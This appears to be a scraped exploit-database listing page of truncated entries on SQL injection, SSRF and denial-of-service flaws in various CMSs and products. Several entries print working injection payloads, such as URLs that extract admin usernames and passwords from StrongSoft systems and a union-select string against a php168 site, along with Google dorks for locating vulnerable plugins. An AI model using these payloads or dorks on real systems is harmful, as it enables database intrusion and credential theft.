Realestate Crowdfunding Script 2.7.2 - pid SQL Injection

Realestate Crowdfunding Script 2.7.2 - pid SQL Injection Exploit Title: Realestate Crowdfunding Script 2.7.2 - SQL Injection Dork: N/A Date: 08.12.2017 Vendor Homepage: https://www.phpscriptsmall.com/ Software Link: https://www.phpscriptsmall.com/product/realestate-crowdfunding-script/ Demo:...

SSRF vulnerability in Bycms user-post method

Bycms Beyoncms is a content management system based on thinkphp 5.0.9. An SSRF vulnerability exists in the Bycms user-post method. An attacker can exploit the vulnerability to detect the database version number and open port service information...

AZL-34922 CVE-2017-3613 affecting package libdb for versions less than 5.3.28-7

Vulnerability in the Data Store component of Oracle Berkeley DB. The supported version that is affected is Prior to 6.2.32. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where Data Store executes to compromise Data Store. Successful attacks...

Error: "Wrong database version is being used" After Upgrading Provisioning Server

The following error is displayed after upgrading Provisioning Server: The wrong database version is being used. Found version: 40 Expected version number: 60...

StrongSoft灾害预警系统 warn/AjaxHandle/AjaxOuterWarnForMerger.ashx DeptID参数SQL注入漏洞

注入链接：/warn/AjaxHandle/AjaxOuterWarnForMerger.ashx 注入参数：DeptID 【获取数据库版本】 /warn/AjaxHandle/AjaxOuterWarnForMerger.ashx?action=GetCheckIdByPid&DeptID=1'+AND+2709=SELECT+@@version+AND+'EcwM'='EcwM 【获取当前数据库】...

StrongSoft灾害预警系统ReportingDetail.aspx ID参数SQL注入漏洞

注入链接：/Disaster/Reporting/ReportingDetail.aspx 注入参数：ID 【获取数据库版本】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND 3=CHAR@@version -- 【管理员账号密码】 /Disaster/Reporting/ReportingDetail.aspx?ID=1' AND+2709=select+top+1+UserID%2b'---'%2bUserPwd+from+strongmain.dbo.WebSystemUser--...

StrongSoft灾害预警系统strFieldName参数SQL注入漏洞

注入链接：/Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx 注入参数：strFieldName 【获取数据库版本】 /Response/AjaxHandle/AjaxSingleGetReferenceFieldValue.ashx?strFieldValue=1&strSelectFieldCollection=1&tableName=sysobjects&strFieldName=convertint,@@version 【管理员账号密码】...

WordPress Like Dislike Counter 1.2.3 SQL Injection

Title : Wordpress Like Dislike Counter Plugin SQL Injection Vulnerability Risk : High+/Critical Exploit Author : XroGuE Google Dork : inurl:plugins/like-dislike-counter-for-posts-pages-and-comments/ajaxcounter.php AND plugins/pro-like-dislike-counter/ldc-ajax-counter.php Plugin Version : 1.2.3...

Lingxia I.C.E CMS Remote Blind SQL Injection Exploit

No description provided by source. !/usr/bin/python ICE CMS Blind SQLi 0day. mrme@pluto ice$ python icecold.py -p localhost:8080 -t 10.3.100.25:8500 -d /ice/ | ---------------------------------------------------- | | Lingxia I.C.E CMS Remote Blind SQL Injection Exploit | | by mrme - net-ninja.net...

Oracle 9.0 iSQL*Plus TLS Listener - Remote Denial of Service Vulnerability

No description provided by source. source: http://www.securityfocus.com/bid/15032/info Oracle iSQLPLUS is susceptible to a vulnerability that allows remote attackers to stop the TNS Listener service, denying further database service to legitimate users. By issuing a specific HTTP request, remote...

Joomla Component (com_idoblog) SQL Injection Vulnerability

No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register import re class TestPOCPOCBase: vulID = '70468' ssvid version = '1.0' author = 'kikay' vulDate = '2010-12-25' createDate ...

phpcms2008 preview.php injection EXP-vulnerability warning-the black bar safety net

phpcms2008 description Phpcms2008 is a paragraph based on PHP+Mysql architecture of the web content management system, it is an open-source PHP development platform. Phpcms uses a modular approach to the development, functional and easy to use to facilitate the expansion, for medium to large site...

php168 know the system injection vulnerability-vulnerability warning-the black bar safety net

I'm finishing up the three keywords inurl:zhidao Powered by qibosoft inurl:w8 Powered by qibosoft inurl:ask Powered by qibosoft http://v7.php168.com/zhidao/user.php?j=question&u=-1+union+select+1,2,3,concatuser,0x3a,version,0x3a,database,5,6,7,8-- The official website of the test ! Database...

JAKCMS 2.01 RC1 - Blind SQL Injection

JAKCMS 2.01 RC1 - Blind SQL Injection !/usr/bin/python jakCMS = v2.01 RC1 Blind SQL Injection Exploit Understanding: The parameters 'JAKCOOKIENAME' and 'JAKCOOKIEPASS' are parsed via cookies to the application and are unchecked for malicious characters. The contents of these variables are directl...

Lingxia I.C.E CMS Remote Blind SQL Injection Exploit

Exploit for php platform in category web applications !/usr/bin/python ICE CMS Blind SQLi 0day. email protected ice$ python icecold.py -p localhost:8080 -t 10.3.100.25:8500 -d /ice/ | ---------------------------------------------------- | | Lingxia I.C.E CMS Remote Blind SQL Injection Exploit | |...

Lingxia I.C.E CMS - Blind SQL Injection

Lingxia I.C.E CMS - Blind SQL Injection !/usr/bin/python ICE CMS Blind SQLi 0day. mrme@pluto ice$ python icecold.py -p localhost:8080 -t 10.3.100.25:8500 -d /ice/ | ---------------------------------------------------- | | Lingxia I.C.E CMS Remote Blind SQL Injection Exploit | | by mrme -...

Atlassian JIRA ConfigureReport.jspa 'reportKey' Information Disclosure

The Atlassian JIRA installation hosted on the remote web server is affected by an information disclosure vulnerability, which an unauthenticated attacker can exploit, by setting the 'reportKey' parameter in ConfigureReport.jspa to an invalid value, to gain access to sensitive information, such as...

MMHAQ CMS - SQL Injection

MMHAQ CMS sqli vulnersbility +Title: MMHAQ CMS sqli vulnersbility +Version: only one version is released +Download: http://www.mmhaq.net/index.php?page=packlinux +Author: s1ayer +Contact: [email protected] Description: MMHAQ CMS fully functional Content Management System in PHP on top of MySQL...

Nabernet (articles.php) Sql Injection Vulnerability

Exploit for unknown platform in category web applications =================================================== Nabernet articles.php Sql Injection Vulnerability =================================================== Nabernet articles.php Sql Injection Vulnerability...

A modify Oracle User Password tips-vulnerability warning-the black bar safety net

Database version: 9.2.0.5 Sometimes we may not know a user's password, but also need to the user do some operation, but also can not go to modify this user's password, this time, you can use some little tricks, to complete the operation. The specific operation process is as follows: SQLPlus:...